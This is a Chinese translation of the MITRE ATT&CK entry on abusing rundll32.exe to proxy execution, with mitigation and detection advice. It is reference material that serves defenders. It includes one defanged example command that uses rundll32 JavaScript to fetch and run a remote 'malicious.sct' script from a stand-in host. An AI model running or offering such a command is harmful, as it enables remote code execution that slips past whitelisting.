译者: 林妙倩、戴亦仑 原创翻译作品,如果需要转载请取得翻译作者同意。
数据来源:ATT&CK Matrices
原文: https://attack.mitre.org/techniques/T1085
术语表: /attack/glossary
可以调用 rundll32.exe 程序来执行任意二进制文件。由于 Windows 使用 rundll32.exe 进行正常操作时会有白名单或误报,攻击者可以利用此功能来代理代码的执行,以避免触发可能未监控 rundll32.exe 进程执行的安全工具的检测。
Rundll32.exe 可通过未记录的 shell32.dll 的
Control_RunDLL
和 Control_RunDLLAsUser
函数来执行控制面板项文件(.CPL)。双击。cpl 文件也可以执行 rundll32.exe。Rundll32 也可用于执行 JavaScript 等脚本。这可以使用类似的语法来完成:rundll32.exe javascript: " ..,RunHTMLApplication ";document.write();GetObject("script:https[:]/www[.]example[.] . com malicious.sct
")"
在恶意软件(例如 Poweliks)中已有这种行为。
Microsoft 增强型缓解体验工具包 (EMET) 的攻击面减少 (Attack Surface Reduction,ASR) 功能可以用来阻止利用 rundll32.exe 绕过白名单的方法。
使用进程监控来监控 rundll32.exe 的执行和参数。 将 rundll32.exe 最近调用与之前的已知良好参数和被加载的 dll 进行比较,以确定异常和潜在的攻击活动。 rundll32.exe 调用中使用的命令参数也可能有助于确定加载 DLL 的来源和目的。